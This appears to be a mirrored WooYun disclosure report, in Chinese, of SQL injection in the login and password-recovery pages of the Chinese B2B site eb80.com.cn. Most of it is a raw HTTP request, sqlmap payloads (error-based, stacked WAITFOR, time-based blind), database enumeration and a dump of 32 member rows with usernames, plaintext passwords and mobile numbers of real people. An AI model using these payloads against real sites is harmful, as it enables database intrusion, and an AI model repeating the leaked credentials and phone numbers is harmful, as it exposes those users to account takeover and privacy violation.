乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-10-29: 积极联系厂商并且等待厂商认领中,细节不对外公开 2015-12-13: 厂商已经主动忽略漏洞,细节向公众公开
中国商业港多处sql注入可导致395万会员信息泄漏(影响大量企业)
http://www.eb80.com.cn/retrieve.aspxhttp://www.eb80.com.cn/login.aspx登陆用户名和密码都存在注入
POST /retrieve.aspx HTTP/1.1Host: www.eb80.com.cnProxy-Connection: keep-aliveContent-Length: 258Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://www.eb80.com.cnUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36Content-Type: application/x-www-form-urlencodedDNT: 1Referer: http://www.eb80.com.cn/retrieve.aspxAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6Cookie: baidu=url=https://www.baidu.com/link?url=NruWSHx6qapsBW8OUE-sd385TXJT2ftf0ip_wap6ZbxFI46wwh3BTaysIRg92oMT&wd=&eqid=e3597bae0000a299000000045631d950; CNZZDATA2189235=cnzz_eid%3D402168800-1445938092-null%26ntime%3D1446103279AlexaToolbar-ALX_NS_PH: AlexaToolbar/alxg-3.3__VIEWSTATE=%2FwEPDwUKMTQxMjk1Mzk2OGRkCQOt689wrulJvSfJR%2Bagkr%2FW03QmpbLnupc2%2BgHxUmc%3D&__EVENTVALIDATION=%2FwEWAwLXw6yLDQKpkq%2B%2BBQKM54rGBs%2BmqWbjv05jIBDG%2BHeMrqu%2FhnDpkRz%2BNN2Twh8l5flh&loginid=1234%40qq.com*&Button1=%C8%A1%BB%D8%C3%DC%C2%EB
参数loginid存在sql注入
Parameter: #1* ((custom) POST) Type: error-based Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause Payload: __VIEWSTATE=/wEPDwUKMTQxMjk1Mzk2OGRkCQOt689wrulJvSfJR+agkr/W03QmpbLnupc2+gHxUmc=&__EVENTVALIDATION=/wEWAwLXw6yLDQKpkq++BQKM54rGBs+mqWbjv05jIBDG+HeMrqu/hnDpkRz+NN2Twh8l5flh&[email protected]' AND 4942=CONVERT(INT,(SELECT CHAR(113)+CHAR(120)+CHAR(98)+CHAR(107)+CHAR(113)+(SELECT (CASE WHEN (4942=4942) THEN CHAR(49) ELSE CHAR(48) END))+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(106)+CHAR(113))) AND 'DnHl'='DnHl&Button1=%C8%A1%BB%D8%C3%DC%C2%EB Type: stacked queries Title: Microsoft SQL Server/Sybase stacked queries (comment) Payload: __VIEWSTATE=/wEPDwUKMTQxMjk1Mzk2OGRkCQOt689wrulJvSfJR+agkr/W03QmpbLnupc2+gHxUmc=&__EVENTVALIDATION=/wEWAwLXw6yLDQKpkq++BQKM54rGBs+mqWbjv05jIBDG+HeMrqu/hnDpkRz+NN2Twh8l5flh&[email protected]';WAITFOR DELAY '0:0:5'--&Button1=%C8%A1%BB%D8%C3%DC%C2%EB Type: AND/OR time-based blind Title: Microsoft SQL Server/Sybase time-based blind (comment) Payload: __VIEWSTATE=/wEPDwUKMTQxMjk1Mzk2OGRkCQOt689wrulJvSfJR+agkr/W03QmpbLnupc2+gHxUmc=&__EVENTVALIDATION=/wEWAwLXw6yLDQKpkq++BQKM54rGBs+mqWbjv05jIBDG+HeMrqu/hnDpkRz+NN2Twh8l5flh&[email protected]' WAITFOR DELAY '0:0:5'--&Button1=%C8%A1%BB%D8%C3%DC%C2%EB---[16:56:57] [INFO] the back-end DBMS is Microsoft SQL Serverweb server operating system: Windows 2003 or XPweb application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 6.0back-end DBMS: Microsoft SQL Server 2008[16:56:57] [INFO] fetching database names[16:56:57] [INFO] the SQL query used returns 9 entries[16:56:57] [INFO] resumed: EbBuy[16:56:57] [INFO] resumed: master[16:56:57] [INFO] resumed: model[16:56:57] [INFO] resumed: msdb[16:56:57] [INFO] resumed: new21tex[16:56:57] [INFO] resumed: ReportServer[16:56:57] [INFO] resumed: ReportServerTempDB[16:56:57] [INFO] resumed: tempdb[16:56:57] [INFO] resumed: zlceshiavailable databases [9]:[*] EbBuy[*] master[*] model[*] msdb[*] new21tex[*] ReportServer[*] ReportServerTempDB[*] tempdb[*] zlceshi
Database: new21tex[46 tables]+--------------+| BuyOne || Cert || GoldenChange || KeyList || MoneyList || News || Pro_cate || Report || SeeBuy || UpdateMoney || admin || appraisal || area || bbs || bbscate || bbsreport || buy || buylink || buyold || cate || cateinfo || client || delmember || dtproperties || favorite || friend || friendlyLink || hangzhou || info || info_cate || info_manage || info_report || job || keywords || link || member || mystore || newcate || pm || poll || question || remark || sale || toupiao || zymjisuande || zymjisuande2 |+--------------+
Database: new21tex+------------------+---------+| Table | Entries |+------------------+---------+| dbo.member | 3953424 || dbo.buylink | 1130709 || dbo.buyold | 774857 || dbo.buy | 375335 || dbo.BuyOne | 212201 || dbo.Pro_cate | 138593 || dbo.cateinfo | 60941 || dbo.sale | 40717 |
列举几条数据证明:
Database: new21texTable: member[32 entries]+----------------+-----------------+-------------+-------------------+| loginid | password | mobile | email |+----------------+-----------------+-------------+-------------------+| hdsm | 232518 | 15888578621 | [email protected] || chunhu888 | 82750082 | 13735051668 | [email protected] || my0397 | 3935555 | 13033788602 | [email protected] || kamada0421 | kamada123456 | 13929413635 | [email protected] || wei10021230 | 123123 | 18639195144 | [email protected] || futianjian | a5682563 | 18473056208 | [email protected] || sdxx | sdxx159 | 13388866666 | [email protected] || nss607 | nss607nss607 | 13602885625 | [email protected] || ykzdhsb | 553231 | 13994227979 | [email protected] || xinglong | 518520 | 18028118004 | [email protected] || fzcs | wyy197828 | 13806479595 | [email protected] || akr123 | akr1234 | 15098944980 | [email protected] || dgy2 | 03557180443 | 15383440960 | [email protected] || ylgs | lwogw | 13533861288 | [email protected] || wangruifa1989 | 1989520mix | 13510005605 | [email protected] || jhfmzziwo | jianhuavalve | 18605366676 | [email protected] || zzcinline | zzcinline | 15300365668 | [email protected] || rst761224 | rst761224123 | 15011876851 | [email protected] || wxtmm123 | tianmimi123 | 15261560098 | [email protected] || bjdpwg | 19656634jdww | 13391838980 | [email protected] || beiya321 | sybywdblj | 13940406166 | [email protected] || xinsenkuangye | 15027773012 | 15027773012 | [email protected] || sindy0418 | tangyanfei1984 | 13815177971 | [email protected] || zzltyl | zhengzhouletong | 13393719244 | [email protected] || shu8615100 | 4502558 | 15337169306 | [email protected] || wmf13608847120 | wmf3310057510 | 13759511960 | [email protected] || zhengmei123 | HAIYANG520 | 18855183912 | [email protected] || a546620 | a546620 | 13929498483 | [email protected] || huamei226 | 890226105 | 15690388969 | [email protected] || hl87935548 | a168168 | 13829175103 | [email protected] || ji1021055299 | jiyuanjin | 13952089461 | [email protected] || cqdudu | abcabc000 | 18523369997 | [email protected] |+----------------+-----------------+-------------+-------------------+
未能联系到厂商或者厂商积极拒绝
漏洞Rank:15 (WooYun评价)